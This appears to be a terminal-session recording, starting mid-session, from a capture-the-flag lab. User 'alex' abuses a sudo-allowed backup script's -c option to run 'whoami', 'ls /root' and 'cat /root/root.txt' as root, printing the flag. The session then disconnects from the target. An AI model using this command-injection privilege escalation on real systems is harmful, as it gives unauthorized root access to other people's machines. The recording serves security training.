stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n\r\nBackup finished\r\nroot\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[122.124181, "o", "c"]
[122.234521, "o", "l"]
[122.339943, "o", "e"]
[122.522371, "o", "a"]
[122.681523, "o", "r"]
[122.781874, "o", "\r\n"]
[122.783071, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[122.784376, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[123.15206, "o", "clear"]
[123.611178, "o", "\b\b\b\b\bsudo /etc/mp3backups/backup.sh -c 'whoami'"]
[124.611736, "o", "\b"]
[125.205802, "o", "\b\u001b[1P'\b"]
[125.349622, "o", "\b\u001b[1P'\b"]
[125.518413, "o", "\b\u001b[1P'\b"]
[125.638678, "o", "\b\u001b[1P'\b"]
[125.780851, "o", "\b\u001b[1P'\b"]
[126.067779, "o", "\b\u001b[1P'\b"]
[126.474872, "o", "l'\b"]
[126.577108, "o", "s'\b"]
[126.677345, "o", "\r\n"]
[127.632931, "o", "find: ‘/run/user/108/gvfs’: Permission denied\r\n/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3\r\n/home/alex/Music/image10.mp3\r\n"]
[127.649489, "o", "/home/alex/Music/image5.mp3\r\n/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\nBacking up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\ntar: Removing leading `/' from member names\r\ntar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n"]
[127.650308, "o", "\r\nBackup finished\r\n"]
[127.652249, "o", "Desktop Documents Downloads Music Pictures Public Templates user.txt Videos\r\n"]
[127.653709, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[131.328534, "o", "sudo /etc/mp3backups/backup.sh -c 'ls'"]
[132.088389, "o", "\b"]
[132.710556, "o", " '\b"]
[133.025282, "o", "/'\b"]
[133.120194, "o", "r'\b"]
[133.277181, "o", "o'\b"]
[133.412313, "o", "o'\b"]
[133.527705, "o", "t'\b"]
[133.839569, "o", "\r\n"]
[134.795994, "o", "find: ‘/run/user/108/gvfs’: Permission denied\r\n/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3\r\n/home/alex/Music/image10.mp3\r\n"]
[134.812931, "o", "/home/alex/Music/image5.mp3\r\n/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\nBacking up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\ntar: Removing leading `/' from member names\r\ntar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n\r\nBackup finished\r\nroot.txt\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[136.696642, "o", "sudo /etc/mp3backups/backup.sh -c 'ls /root'"]
[137.351533, "o", "\b"]
[138.29049, "o", "/'\b"]
[138.571086, "o", "r'\b"]
[138.65199, "o", "o'\b"]
[138.77288, "o", "o'\b"]
[138.869316, "o", "t'\b"]
[139.071171, "o", ".'\b"]
[139.548913, "o", "t'\b"]
[139.666543, "o", "x'\b"]
[139.725527, "o", "t'\b"]
[140.282535, "o", "\b"]
[140.679865, "o", "\b"]
[140.698859, "o", "\b"]
[140.719062, "o", "\b"]
[140.758713, "o", "\b"]
[140.778325, "o", "\b"]
[140.79764, "o", "\b"]
[140.817509, "o", "\b"]
[140.857628, "o", "\b"]
[140.878366, "o", "\b"]
[140.897827, "o", "\b"]
[140.918672, "o", "\b"]
[140.960166, "o", "\b"]
[140.978584, "o", "\b"]
[140.998398, "o", "\b"]
[141.71557, "o", "\b\u001b[1P /root/root.txt'\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[141.85544, "o", "\b\u001b[1P /root/root.txt'\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[142.199126, "o", "c /root/root.txt'\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[142.398907, "o", "a /root/root.txt'\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[142.500129, "o", "t /root/root.txt'\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[143.141489, "o", "\r\n"]
[144.133172, "o", "find: ‘/run/user/108/gvfs’: Permission denied\r\n/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3\r\n/home/alex/Music/image10.mp3\r\n"]
[144.148958, "o", "/home/alex/Music/image5.mp3\r\n/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\nBacking up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\ntar: Removing leading `/' from member names\r\ntar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n\r\nBackup finished\r\nflag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[162.085889, "o", "e"]
[162.273863, "o", "x"]
[162.357378, "o", "i"]
[162.486752, "o", "t"]
[162.608815, "o", "\r\n"]
[162.609617, "o", "logout\r\n"]
[162.610175, "o", "Connection to 10.66.157.51 closed.\r\r\n"]
[162.625182, "o", "\r\n"]
[162.625399, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[162.718903, "o", "e\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[162.876108, "o", "x\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[162.986115, "o", "i"]
[163.118433, "o", "t"]
[163.258814, "o", "\r\n\u001b[?2004l\r"]
[163.258903, "o", "exit\r\n"]
